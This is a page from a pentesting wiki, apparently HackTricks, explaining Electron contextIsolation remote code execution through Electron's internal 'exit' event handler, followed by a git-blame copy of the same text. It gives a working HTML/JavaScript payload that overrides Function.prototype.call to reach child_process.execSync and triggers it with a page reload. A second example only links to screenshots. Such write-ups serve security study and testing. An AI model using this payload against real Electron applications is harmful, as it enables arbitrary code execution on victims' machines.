hacktricks/network-services-pentesting/pentesting-web/electron-desktop-apps/electron-contextisolation-rce-via-electron-internal-code.md

# Electron contextIsolation RCE via Electron internal code

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}

## Example 1

Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)

"exit" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation:

```javascript
process.on('exit', function (){
    for (let p in cachedArchives) {
        if (!hasProp.call(cachedArchives, p)) continue
        cachedArchives[p].destroy()
    }
})
```

{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}

![](<../../../.gitbook/assets/image (1070).png>)

https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists

Then it goes here:

![](<../../../.gitbook/assets/image (793).png>)

Where "self" is Node's process object:

![](<../../../.gitbook/assets/image (700).png>)

The process object has a references to "require" function:

```
process.mainModule.require
```

As the handler.call is going to receive the process object we can overwrite it to execute arbitrary code:

```html
<script>
Function.prototype.call = function(process){
    process.mainModule.require('child_process').execSync('calc');
}
location.reload();//Trigger the "exit" event
</script>
```

## Example 2

Get **require object from prototype pollution**. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)

Leak:

<figure><img src="../../../.gitbook/assets/image (279).png" alt=""><figcaption></figcaption></figure>

Exploit:

<figure><img src="../../../.gitbook/assets/image (89).png" alt=""><figcaption></figcaption></figure>

{% hint style="success" %}
Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)

<details>

<summary>Support HackTricks</summary>

* Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.

</details>
{% endhint %}
GitBook: [#3293] No subject 2022-06-28 17:21:21 +00:00			`# Electron contextIsolation RCE via Electron internal code`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
gpt-4o-mini 2024-07-18 20:49:07 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00			`<details>`

gpt-4o-mini 2024-07-18 20:49:07 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
gpt-4o-mini 2024-07-18 20:49:07 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
gpt-4o-mini 2024-07-18 20:49:07 +00:00			`{% endhint %}`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3293] No subject 2022-06-28 17:21:21 +00:00			`## Example 1`
GitBook: [#3110] No subject 2022-04-20 12:35:33 +00:00
			`Example from [https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41](https://speakerdeck.com/masatokinugawa/electron-abusing-the-lack-of-context-isolation-curecon-en?slide=41)`

			`"exit" event listener is always set by the internal code when de page loading is started. This event is emitted just before navigation:`

			```javascript
			`process.on('exit', function (){`
			`for (let p in cachedArchives) {`
			`if (!hasProp.call(cachedArchives, p)) continue`
			`cachedArchives[p].destroy()`
			`}`
			`})`
			```

			`{% embed url="https://github.com/electron/electron/blob/664c184fcb98bb5b4b6b569553e7f7339d3ba4c5/lib/common/asar.js#L30-L36" %}`

GitBook: No commit message 2024-05-05 17:56:05 +00:00			`![](<../../../.gitbook/assets/image (1070).png>)`
GitBook: [#3110] No subject 2022-04-20 12:35:33 +00:00
			`https://github.com/nodejs/node/blob/8a44289089a08b7b19fa3c4651b5f1f5d1edd71b/bin/events.js#L156-L231 -- No longer exists`

			`Then it goes here:`

GitBook: No commit message 2024-05-05 17:56:05 +00:00			`![](<../../../.gitbook/assets/image (793).png>)`
GitBook: [#3110] No subject 2022-04-20 12:35:33 +00:00
			`Where "self" is Node's process object:`

GitBook: No commit message 2024-05-05 17:56:05 +00:00			`![](<../../../.gitbook/assets/image (700).png>)`
GitBook: [#3110] No subject 2022-04-20 12:35:33 +00:00
			`The process object has a references to "require" function:`

			```
			`process.mainModule.require`
			```

			`As the handler.call is going to receive the process object we can overwrite it to execute arbitrary code:`

			```html
			`<script>`
			`Function.prototype.call = function(process){`
			`process.mainModule.require('child_process').execSync('calc');`
			`}`
			`location.reload();//Trigger the "exit" event`
			`</script>`
			```
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3669] No subject 2022-12-03 18:45:54 +00:00			`## Example 2`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3669] No subject 2022-12-03 18:45:54 +00:00			`Get require object from prototype pollution. From [https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81](https://www.youtube.com/watch?v=Tzo8ucHA5xw\&list=PLH15HpR5qRsVKcKwvIl-AzGfRqKyx--zq\&index=81)`

			`Leak:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: No commit message 2024-05-05 17:56:05 +00:00			`<figure><img src="../../../.gitbook/assets/image (279).png" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: [#3669] No subject 2022-12-03 18:45:54 +00:00			`Exploit:`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
GitBook: No commit message 2024-05-05 17:56:05 +00:00			`<figure><img src="../../../.gitbook/assets/image (89).png" alt=""><figcaption></figcaption></figure>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
gpt-4o-mini 2024-07-18 20:49:07 +00:00			`{% hint style="success" %}`
			`Learn & practice AWS Hacking:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[HackTricks Training AWS Red Team Expert (ARTE)](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\`
			`Learn & practice GCP Hacking: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[HackTricks Training GCP Red Team Expert (GRTE)<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)`

GitBook: [#3669] No subject 2022-12-03 18:45:54 +00:00			`<details>`

gpt-4o-mini 2024-07-18 20:49:07 +00:00			`<summary>Support HackTricks</summary>`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
gpt-4o-mini 2024-07-18 20:49:07 +00:00			`* Check the [subscription plans](https://github.com/sponsors/carlospolop)!`
			`* Join the 💬 [Discord group](https://discord.gg/hRep4RUj7f) or the [telegram group](https://t.me/peass) or follow us on Twitter 🐦 [@hacktricks\_live](https://twitter.com/hacktricks\_live).`
			`* Share hacking tricks by submitting PRs to the [HackTricks](https://github.com/carlospolop/hacktricks) and [HackTricks Cloud](https://github.com/carlospolop/hacktricks-cloud) github repos.`
Ad hacktricks sponsoring 2022-04-28 16:01:33 +00:00
			`</details>`
gpt-4o-mini 2024-07-18 20:49:07 +00:00			`{% endhint %}`